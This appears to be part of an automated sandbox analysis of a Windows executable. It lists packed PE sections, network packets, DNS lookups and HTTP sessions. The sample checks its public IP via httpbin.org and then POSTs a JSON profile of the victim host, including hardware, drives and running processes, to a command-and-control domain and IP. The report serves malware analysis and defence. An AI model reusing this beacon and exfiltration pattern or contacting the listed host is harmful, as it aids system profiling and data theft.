(empty) | 0x72c000 | 0x388000 | 0x200 | ffb98299c4d7e8d896bc35cb9ce83ef2 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
acnazlro | 0xab4000 | 0x1b6000 | 0x1b5400 | 67b4b2bfbe44490a1fedde178f7d1f4c | False | 0.9944080769368211 | data | 7.955898170729066 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
qaecibqv | 0xc6a000 | 0x1000 | 0x600 | 6e0618e4b8f34463427d7ac0845f3005 | False | 0.5377604166666666 | data | 4.881999142634421 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc6b000 | 0x3000 | 0x2200 | 81fbf9b5d8d06420a52e926b3eeb69dd | False | 0.06169577205882353 | DOS executable (COM) | 0.6843955254926384 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc690dc | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Dec 23, 2024 17:15:31.254615068 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.254616976 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.254667997 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.254688978 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.254728079 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.375174046 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375227928 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375282049 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.375282049 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.375307083 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375325918 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375334978 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375339031 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375341892 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375345945 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375349998 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375358105 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375361919 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375372887 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375380039 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.375381947 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.375406027 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.494884968 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.494935989 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.494966030 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.494997025 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495023966 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495052099 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495079041 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495105982 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495132923 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495160103 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495187998 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495213985 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495240927 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495254993 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.495266914 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495295048 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495342970 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495348930 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.495371103 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495398045 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495424986 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495451927 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495479107 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495506048 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495532990 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495558977 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495593071 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495625973 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495654106 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495681047 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495707989 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495733976 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495760918 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495786905 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495814085 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495840073 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495866060 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495892048 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495918989 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495944977 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495970964 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.495999098 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.496026039 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.496052980 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.496079922 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.496107101 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.496133089 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.496160030 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.496186972 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.496334076 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.616277933 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.616295099 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.616317987 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.616327047 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.616337061 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.616345882 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.616355896 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.616729975 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.616815090 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.618370056 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.618391991 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.618540049 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.618550062 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.618597031 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.618607998 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.618688107 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.618697882 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.618747950 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.618757010 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.618861914 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.618870974 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619074106 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619144917 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619246006 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619255066 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619380951 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619390011 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619472980 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619539976 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619579077 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619645119 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619708061 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619716883 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619826078 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619836092 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619853973 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619862080 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619942904 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.619962931 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620023012 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620031118 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620083094 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620091915 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620228052 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620284081 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620341063 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620362997 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620419025 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620429039 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620510101 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620520115 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620600939 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620609045 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620734930 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620744944 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620801926 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620811939 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620851994 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620862007 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620901108 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.620910883 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.621015072 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.621026039 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.621278048 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.737015963 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737164974 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737281084 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737309933 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737481117 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737524033 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737575054 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737601995 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737649918 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737678051 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737756014 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737785101 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737812042 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737838030 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737884998 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737915039 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737941980 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.737976074 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738003016 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738029957 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738101959 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738130093 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738183022 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738209963 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738280058 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738306999 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738359928 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738410950 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738477945 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738504887 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738554955 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738581896 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738660097 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738687038 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738734961 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738763094 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738905907 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738934994 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738967896 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.738997936 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.739106894 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.739134073 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.739217043 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.739305973 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.739408970 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.739514112 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.739804983 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.739833117 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.739887953 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.739916086 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.739965916 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.739994049 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.740020990 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.740052938 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741149902 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741266012 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741405010 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741439104 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741466045 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741533041 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741560936 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741610050 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741637945 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741697073 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741749048 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741841078 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741897106 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741945982 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.741972923 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742022038 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742048979 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742098093 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742125988 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742153883 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742208004 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742235899 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742278099 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742309093 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742374897 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742403030 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742429972 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742480993 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742506981 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742533922 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742561102 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742589951 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742621899 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742790937 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742820024 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742923975 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.742953062 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.743025064 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.743052959 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.743156910 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.743185043 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:16:02.379251003 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:16:02.379364014 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:16:02.379443884 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:16:02.379940987 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:16:02.499485016 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:16:03.136086941 CET4971280192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:16:03.255723000 CET8049712185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:16:03.255897999 CET4971280192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:16:03.256463051 CET4971280192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:16:03.375999928 CET8049712185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:16:12.926074028 CET8049712185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:16:12.926196098 CET8049712185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:16:12.926284075 CET4971280192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:16:12.926645041 CET4971280192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:16:13.046423912 CET8049712185.121.15.192192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 17:15:25.681941032 CET | 60051 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 17:15:25.682001114 CET | 60051 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 17:15:25.820022106 CET | 53 | 60051 | 1.1.1.1 | 192.168.2.8
Dec 23, 2024 17:15:25.991029024 CET | 53 | 60051 | 1.1.1.1 | 192.168.2.8
Dec 23, 2024 17:15:29.486104965 CET | 60054 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 17:15:29.486166000 CET | 60054 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 17:15:30.026251078 CET | 53 | 60054 | 1.1.1.1 | 192.168.2.8
Dec 23, 2024 17:15:30.026447058 CET | 53 | 60054 | 1.1.1.1 | 192.168.2.8
Dec 23, 2024 17:16:02.996191025 CET | 55185 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 17:16:02.996268988 CET | 55185 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 17:16:03.134632111 CET | 53 | 55185 | 1.1.1.1 | 192.168.2.8
Dec 23, 2024 17:16:03.134677887 CET | 53 | 55185 | 1.1.1.1 | 192.168.2.8
                                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                Dec 23, 2024 17:15:25.681941032 CET | 192.168.2.8 | 1.1.1.1 | 0xaa46 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
                                                Dec 23, 2024 17:15:25.682001114 CET | 192.168.2.8 | 1.1.1.1 | 0xa54e | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
                                                Dec 23, 2024 17:15:29.486104965 CET | 192.168.2.8 | 1.1.1.1 | 0xb507 | Standard query (0) | home.twentytk20ht.top | A (IP address) | IN (0x0001) | false
                                                Dec 23, 2024 17:15:29.486166000 CET | 192.168.2.8 | 1.1.1.1 | 0x840e | Standard query (0) | home.twentytk20ht.top | 28 | IN (0x0001) | false
                                                Dec 23, 2024 17:16:02.996191025 CET | 192.168.2.8 | 1.1.1.1 | 0x2f92 | Standard query (0) | home.twentytk20ht.top | A (IP address) | IN (0x0001) | false
                                                Dec 23, 2024 17:16:02.996268988 CET | 192.168.2.8 | 1.1.1.1 | 0x7948 | Standard query (0) | home.twentytk20ht.top | 28 | IN (0x0001) | false
                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                Dec 23, 2024 17:15:25.991029024 CET | 1.1.1.1 | 192.168.2.8 | 0xaa46 | No error (0) | httpbin.org |  | 98.85.100.80 | A (IP address) | IN (0x0001) | false
                                                Dec 23, 2024 17:15:25.991029024 CET | 1.1.1.1 | 192.168.2.8 | 0xaa46 | No error (0) | httpbin.org |  | 34.226.108.155 | A (IP address) | IN (0x0001) | false
                                                Dec 23, 2024 17:15:30.026251078 CET | 1.1.1.1 | 192.168.2.8 | 0xb507 | No error (0) | home.twentytk20ht.top |  | 185.121.15.192 | A (IP address) | IN (0x0001) | false
                                                Dec 23, 2024 17:16:03.134632111 CET | 1.1.1.1 | 192.168.2.8 | 0x2f92 | No error (0) | home.twentytk20ht.top |  | 185.121.15.192 | A (IP address) | IN (0x0001) | false
                                                • httpbin.org
                                                • home.twentytk20ht.top
                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                0 | 192.168.2.8 | 49706 | 185.121.15.192 | 80 | 2664 | C:\Users\user\Desktop\B43WRnzSPD.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 23, 2024 17:15:30.153435946 CET | 12360 | OUT | POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1
                                                Host: home.twentytk20ht.top
                                                Accept: */*
                                                Content-Type: application/json
                                                Content-Length: 442861
                                                Data Ascii: { "ip": "8.46.123.189", "current_time": "1734970528", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 744 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 372 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                Dec 23, 2024 17:16:02.379251003 CET | 194 | IN | HTTP/1.0 504 Gateway Time-out
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Type: text/html
                                                Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                1 | 192.168.2.8 | 49712 | 185.121.15.192 | 80 | 2664 | C:\Users\user\Desktop\B43WRnzSPD.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 23, 2024 17:16:03.256463051 CET | 272 | OUT | POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1
                                                Host: home.twentytk20ht.top
                                                Accept: */*
                                                Content-Type: application/json
                                                Content-Length: 128
                                                Data Ascii: { "id1": "<html><body><h1>504 Gateway Time-out<\/h1>\nThe server didn't respond in time.\n<\/body><\/html>\n", "data": "Done1" }
                                                Dec 23, 2024 17:16:12.926074028 CET | 309 | IN | HTTP/1.1 502 Bad Gateway
                                                Server: nginx/1.22.1
                                                Date: Mon, 23 Dec 2024 16:16:12 GMT
                                                Content-Type: text/html
                                                Content-Length: 157
                                                Connection: close
                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                0 | 192.168.2.8 | 49705 | 98.85.100.80 | 443 | 2664 | C:\Users\user\Desktop\B43WRnzSPD.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-23 16:15:27 UTC | 52 | OUT | GET /ip HTTP/1.1
                                                Host: httpbin.org
                                                Accept: */*
                                                2024-12-23 16:15:28 UTC | 224 | IN | HTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 16:15:28 GMT
                                                Content-Type: application/json
                                                Content-Length: 31
                                                Connection: close
                                                Server: gunicorn/19.9.0
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Credentials: true
                                                2024-12-23 16:15:28 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
